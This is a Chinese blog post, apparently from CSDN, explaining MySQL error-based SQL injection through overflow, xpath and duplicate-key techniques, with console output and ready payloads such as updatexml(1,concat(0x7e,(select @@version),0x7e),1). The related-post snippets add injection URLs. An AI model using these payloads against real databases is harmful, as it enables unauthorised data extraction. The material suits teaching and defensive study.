mysql报错注入_MYSQL报错注入的一点总结

最新推荐文章于 2024-05-24 15:55:04 发布
最新推荐文章于 2024-05-24 15:55:04 发布
阅读量215 收藏
点赞数
文章标签: mysql报错注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_31965935/article/details/111901004
版权

SQL报错注入就是利用数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。这种手段在联合查询受限且能返回错误信息的情况下比较好用,毕竟用盲注的话既耗时又容易被封。

MYSQL报错注入个人认为大体可以分为以下几类:

BIGINT等数据类型溢出

xpath语法错误

concat+rand()+group_by()导致主键重复

一些特性

下面就针对这几种错误类型看看背后的原理是怎样的。

0x01 数据溢出

在mysql5.5之前,整形溢出是不会报错的,根据官方文档说明out-of-range-and-overflow,只有版本号大于5.5.5时,才会报错。试着对最大数做加法运算,可以看到报错的具体情况:

mysql> select 18446744073709551615+1;

ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(18446744073709551615 + 1)'

在mysql中,要使用这么大的数,并不需要输入这么长的数字进去,使用按位取反运算运算即可:

mysql> select ~0;

+----------------------+

| ~0                   |

+----------------------+

| 18446744073709551615 |

+----------------------+

1 row in set (0.00 sec)

mysql> select ~0+1;

ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(~(0) + 1)'

我们知道,如果一个查询成功返回,则其返回值为0,进行逻辑非运算后可得1,这个值是可以进行数学运算的:

mysql> select (select * from (select user())x);

+----------------------------------+

| (select * from (select user())x) |

+----------------------------------+

| root@localhost                   |

+----------------------------------+

1 row in set (0.00 sec)

mysql> select !(select * from (select user())x);

+-----------------------------------+

| !(select * from (select user())x) |

+-----------------------------------+

|                                 1 |

+-----------------------------------+

1 row in set (0.01 sec)

mysql> select !(select * from (select user())x)+1;

+-------------------------------------+

| !(select * from (select user())x)+1 |

+-------------------------------------+

|                                   2 |

+-------------------------------------+

1 row in set (0.00 sec)

同理,利用exp函数也会产生类似的溢出错误:

mysql> select exp(709);

+-----------------------+

| exp(709)              |

+-----------------------+

| 8.218407461554972e307 |

+-----------------------+

1 row in set (0.00 sec)

mysql> select exp(710);

ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'

注入姿势:

mysql> select exp(~(select*from(select user())x));

ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'

利用这一特性,再结合之前说的溢出报错,就可以进行注入了。这里需要说一下,经笔者测试,发现在mysql5.5.47可以在报错中返回查询结果:

mysql> select (select(!x-~0)from(select(select user())x)a);

ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '((not('root@localhost')) - ~(0))'

而在mysql>5.5.53时,则不能返回查询结果

mysql> select (select(!x-~0)from(select(select user())x)a);

ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '((not(`a`.`x`)) - ~(0))'

此外,报错信息是有长度限制的,在mysql/my_error.c中可以看到:

/* Max length of a error message. Should be

kept in sync with MYSQL_ERRMSG_SIZE. */

#define ERRMSGSIZE (512)

0x02 xpath语法错误

从mysql5.1.5开始提供两个XML查询和修改的函数,extractvalue和updatexml。extractvalue负责在xml文档中按照xpath语法查询节点内容,updatexml则负责修改查询到的内容:

mysql> select extractvalue(1,'/a/b');

+------------------------+

| extractvalue(1,'/a/b') |

+------------------------+

|                        |

+------------------------+

1 row in set (0.01 sec)

它们的第二个参数都要求是符合xpath语法的字符串,如果不满足要求,则会报错,并且将查询结果放在报错信息里:

mysql> select updatexml(1,concat(0x7e,(select @@version),0x7e),1);

ERROR 1105 (HY000): XPATH syntax error: '~5.7.17~'

mysql> select extractvalue(1,concat(0x7e,(select @@version),0x7e));

ERROR 1105 (HY000): XPATH syntax error: '~5.7.17~'

0x03 主键重复

这里利用到了count()和group by在遇到rand()产生的重复值时报错的思路。网上比较常见的payload是这样的:

mysql> select count(*) from test group by concat(version(),floor(rand(0)*2));

ERROR 1062 (23000): Duplicate entry '5.7.171' for key ''

可以看到错误类型是duplicate entry,即主键重复。实际上只要是count,rand(),group by三个连用就会造成这种报错,与位置无关:

mysql> select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x;

ERROR 1062 (23000): Duplicate entry '5.7.171' for key ''

这种报错方法的本质是因为floor(rand(0)*2)的重复性,导致group by语句出错。group by key的原理是循环读取数据的每一行,将结果保存于临时表中。读取每一行的key时,如果key存在于临时表中,则不在临时表中更新临时表的数据;如果key不在临时表中,则在临时表中插入key所在行的数据。举个例子,表中数据如下:

mysql> select * from test;

+------+-------+

| id   | name  |

+------+-------+

| 0    | jack  |

| 1    | jack  |

| 2    | tom   |

| 3    | candy |

| 4    | tommy |

| 5    | jerry |

+------+-------+

6 rows in set (0.00 sec)

我们以select count(*) from test group by name语句说明大致过程如下:

先是建立虚拟表,其中key为主键,不可重复:

key

count(*)

开始查询数据,去数据库数据,然后查看虚拟表是否存在,不存在则插入新记录,存在则count(*)字段直接加1:

key

count(*)

jack

1

key

count(*)

jack

1+1

key

count(*)

jack

1+1

tom

1

key

count(*)

jack

1+1

tom

1

candy

1

当这个操作遇到rand(0)*2时,就会发生错误,其原因在于rand(0)是个稳定的序列,我们计算两次rand(0):

mysql> select rand(0) from test;

+---------------------+

| rand(0)             |

+---------------------+

| 0.15522042769493574 |

|   0.620881741513388 |

|  0.6387474552157777 |

| 0.33109208227236947 |

|  0.7392180764481594 |

|  0.7028141661573334 |

+---------------------+

6 rows in set (0.00 sec)

mysql> select rand(0) from test;

+---------------------+

| rand(0)             |

+---------------------+

| 0.15522042769493574 |

|   0.620881741513388 |

|  0.6387474552157777 |

| 0.33109208227236947 |

|  0.7392180764481594 |

|  0.7028141661573334 |

+---------------------+

6 rows in set (0.00 sec)

同理,floor(rand(0)*2)则会固定得到011011...的序列(这个很重要):

mysql> select floor(rand(0)*2) from test;

+------------------+

| floor(rand(0)*2) |

+-----------

木匠小强
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MYSQL报错注入
聚鼎安全
01-08 3277
目录审计思路报错语句报错函数查询表floor报错函数讲解报错原理语句xpath语法报错函数讲解语句整数溢出报错exppowcot列名重复报错name_constjoin using几何函数报错不存在函数报错 审计思路 代码中带入查询的参数没有经过任何过滤并产生报错,具有报错信息提示,就可以用报错查询。 常用报错检测符号:’ \ ; %00 ) ( # " 报错函数通常尤其最长报错输出的限制,面对这种情况,可以进行分割输出。 特殊函数的特殊参数进运行一个字段、一行数据的返回,使用group_c
MYSQL updatexml()函数报错注入解析
09-09
这个函数在处理XML数据非常有用,但同也可能成为安全漏洞的来源,特别是在没有正确过滤用户输入的情况下,可能导致SQL报错注入。 `updatexml()`函数的基本语法如下: ```sql UPDATEXML(XML_document, XPath_...
sql注入pythonpoco_十种MySQL报错注入
weixin_39532352的博客
12-11 91
1.floor()select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);2.extractvalue()select * from test where id=1 a...
Mysql注入详细讲解
最新发布
2401_84466359的博客
05-24 765
*原理:**用户向数据库里存入恶意的数据,在数据被插入到数据库之前,肯定会对数据库进行转义处理,但用户输入的数据的内容肯定是一点摸样也不会变的存进数据库里,而一般都默认为数据库里的信息都是安全的,查询的候不会进行处理,所以当用户的恶意数据被web程序调用的候就有可能出发SQL注入。GET/POST提交数据,发现提交的数据被加密了(可能js加密),那么在提交数据前,抓包,解密,将注入语句写好,然后将整个语句进行加密(相同加密算法),再将数据发过去。HTTP 头注入常常发生在程序采集用户信息的模块中。
MySQL注入中报错的利用
weixin_33763244的博客
01-17 114
MySQL注入中报错的利用 在很多的情况 下我们不能直接方便的进行注入,于是有了BENCHMARK延迟注射,如果能得到MySQL的错误信息的话,现在又有了更方便的方法。 网上流传了两三种方法,以前我在BLOG也记录了其中一种: //利用MySQL出错爆出字段 mysql> SELECT * FROM (SELECT * FROM user A JOI...
MySQL报错注入
秋水的博客
09-03 1454
注入简介 什么是报错注入? 顾名思义,报错注入就是通过页面爆出的错误信息,构造合适的语句来获取我们想要的数据,本章节讲述的注入,数据库MySQL 报错注入成因 那么报错注入是怎么形成的呢? 首先是应用系统未关闭数据库报错函数,对于一些SQL语句的错误,直接回显在了页面上,部分甚至直接泄露数据库名和表名; 其次,必不可少就是后台未对MySQL相应的报错函数进行过滤 引入知识 ...
MySQL暴错注入方法整理
zhalang8324的博客
01-09 658
1、通过floor暴错 /*数据库版本*/ http://www.hackdig.com/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1)
MySQL五种报错注入1
08-04
MySQL五种报错注入是一种利用数据库的错误反馈信息来获取敏感数据的技术,通常在网站存在SQL注入漏洞被攻击者利用。以下将详细介绍这些方法: 1. **数据库版本暴露** 利用`information_schema.tables`系统表和`...
Mysql报错注入详解.docx
11-20
Mysql报错注入详解.docxMysql报错注入详解.docx
web-报错注入-皮卡丘靶场
07-15
总结起来,报错注入是通过利用Web应用的错误处理机制来揭示数据库信息的安全漏洞。在"皮卡丘靶场"中,我们看到的实例展示了如何通过`updatexml()`和`extractvalue()`函数进行这种攻击,包括获取数据库名、表名、字段...
mysql报错注入_mysql报错注入
weixin_29214335的博客
01-13 248
报错注入这里主要介绍3种MySQL数据库报错注入的发法,分别是updatexml、floor和exp。1.updatexmlupdatexml的报错原理从本质上来说就是函数的报错。selectupdatexml(1,concat(0x7e,(select version()),0x7e),1);这里还是使用前面的例子,举出一个爆破数据库版本的样例Payload:爆破数据库版本信息?id=1' +...
Mysql注入 -- 报错注入
weixin_41489908的博客
05-20 740
刻清零,不要老把自己的一套拿出来。。。 ---- 网易云热评 一、常用函数 1、count();统计该列有几条数据 2、rand():产生0-1随机数 3、group by:根据某一列排序,改列必须出现在前面查询的内容 4、floor(1.23):获取小于等于该值的最大整数 5、as:给查询的列名内容重命名 6、concat(1,2,3):将里面的内容连接在一起 二、实例演示 1、获取当前数据库名称 http://192.168.139.129/sqli/Less-.
GBase 8c V3.0.0数据类型——故障注入系统函数
ricemaster的博客
07-21 105
GBase 8c V3.0.0数据类型——故障注入系统函数
mysql6种报错注入_十种MySQL报错注入
weixin_31108679的博客
01-27 143
以下均摘自《代码审计:企业级Web代码安全架构》一书1.floor()select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a); 2.extractvalue()sele...
mysql中文注入_SQL注入之Mysql报错注入
weixin_33923059的博客
01-31 138
——志向和热爱是伟大行为的双翼。昨天偷懒了没学什么东西,先自我反省一下 - -。今天认真的学习了一下Mysql报错注入利用方法及原理,好久之前就像认真的学一下这个了,是在上海市大学生网络安全大赛中遇到的web100。当懵逼状态,被学长提醒了一下才知道是Mysql报错注入,因为之前一直都没接触过,所以当只是知道怎么用然后拿了flag。其实根本不知道什么原理怎么回事,直到今天才把一些常见的报错注入...
mysql报错注入_mysql报错注入手工方法
weixin_36236823的博客
12-23 135
以前觉得报错注入有那么一长串,还有各种concat(),rand()之类的函数,不方便记忆和使用,一直没怎么仔细的学习过。这次专门学习了一下,看了一些大牛的总结,得到一些经验,特此记录下来,以备后续巩固复习。总体来说,报错注入其实是一种公式化的注入方法,主要用于在页面中没有显示位,但是用echo mysql_error();输出了错误信息使用。公式具体如下and(select 1 from(se...
mysql select count 5万条数据很慢_Mysql注入总结
weixin_39921131的博客
11-28 694
1 0X00 简介本文是关于Mysql注入相关知识的总结Mysql利用方式较为灵活,这里总结了一些常用的姿势。1 0x01 union select注入http://127.0.0.1/?id=1' order by 5 --+http://127.0.0.1/?id=-1' union select 1,2,3,4,5 --+http://127.0.0.1/?id=-1...
mysql报错注入原理,MySQL报错注入
weixin_42416926的博客
03-24 370
什么是报错注入SQL报错注入就是利用数据库的某些机制,人为地制造错误条件,使得查询结果可以出现在错误信息中。我一位好友的博客写过一个SQL注入的专栏,除了报错注入以外,别的类型也写了,而且比较详细,我个人比较推荐阅读。数据溢出报错在某些版本中,可以通过exp函数的特性结合整数溢出的报错进行注入,比如这样select (select(!x-~0)from(select(select user())x...
MySQL报错函数注入及原理
末初的CSDN博客
05-15 1140
参考: https://www.cnblogs.com/xdans/p/5412468.html https://www.cnblogs.com/zztac/p/11441292.html 报错注入,顾名思义,利用数据库报错来回显数据的注入方式,但是这种方法有一点局限性,就是需要源码中有mysql输出错误的函数把mysql的错误回显到前端,否则就不构成报错注入了 文章目录Extractvalue()Updatexml()Floor()Exp() 正文 Extractvalue() Updatex.
mysql报错注入updatexml原理
05-17
MySQL 报错注入是一种利用错误信息披露漏洞来进行 SQL 注入攻击的方法。其中,updatexml 函数是一种常用的利用方式之一。 updatexml 函数可以用于对 XML 类型的数据进行操作。其基本语法如下: ``` updatexml(target_xml, xpath_expr, new_value) ``` 其中,target_xml 是待修改的 XML 数据,xpath_expr 是 XPath 表达式,new_value 是新的值。 在进行 SQL 注入攻击,攻击者可以构造恶意的 xpath_expr 参数,使得 MySQL 数据库返回错误的信息,从而获取敏感信息。 具体实现方法可以参考以下示例: ``` SELECT updatexml(null,concat(0x7e,(SELECT user()),0x7e),null); ``` 在这个例子中,攻击者使用 concat 函数将波浪符号(0x7e)和当前用户的信息拼接成字符串,并作为 xpath_expr 参数传递给 updatexml 函数。由于这个参数不合法,MySQL 数据库会返回错误信息,其中包含了当前用户的信息。攻击者就可以从错误信息中获取敏感信息。 为了防止这种攻击,应该对用户输入进行严格的过滤和验证,避免恶意的输入。同,也可以通过限制 MySQL 用户的权限来降低攻击的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值